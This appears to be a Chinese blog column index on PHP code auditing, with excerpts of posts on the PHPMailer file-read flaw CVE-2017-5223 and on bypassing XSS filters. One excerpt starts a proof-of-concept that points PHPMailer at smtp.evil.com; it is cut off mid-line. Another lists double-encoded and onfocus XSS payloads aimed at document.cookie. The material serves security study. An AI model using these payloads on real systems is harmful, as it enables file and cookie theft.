![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
PHP代码审计之路
一步一步,由浅入深。
佛性死磕
学的更多,只为自由。
展开
-
PHPMailer 任意文件读取漏洞
CVE-2017-5223POC<?php # Author:Yxlinkrequire_once('PHPMailerAutoload.php');$mail = new PHPMailer();$mail->IsSMTP();$mail->Host = "smtp.evil.com";$mail->Port = 25;$mail->SMTPAuth = true; $mail->CharSet = "UTF-8";$mail->E原创 2020-11-20 10:06:20 · 454 阅读 · 0 评论 -
PHP代码审计-部分函数_2.0
过滤XSS的函数:htmlspecialchars()简单写个XSS效果加上函数之后是这样的结果原因是进行了HTML字符实体转码绕过如果有url两次解码情况,可以使用双重编码绕过%253cscript%253ealert(document.cookie)%253c/script%253e对’ " \的转义addslashes()对于sql注入的,就想到宽字节注入如果是XSS的<input onfocus=alert(/xss/) autofocus>原创 2020-09-14 11:10:58 · 141 阅读 · 0 评论 -
PHP代码审计-从安装到开始_1
1原创 2020-09-13 19:22:23 · 377 阅读 · 0 评论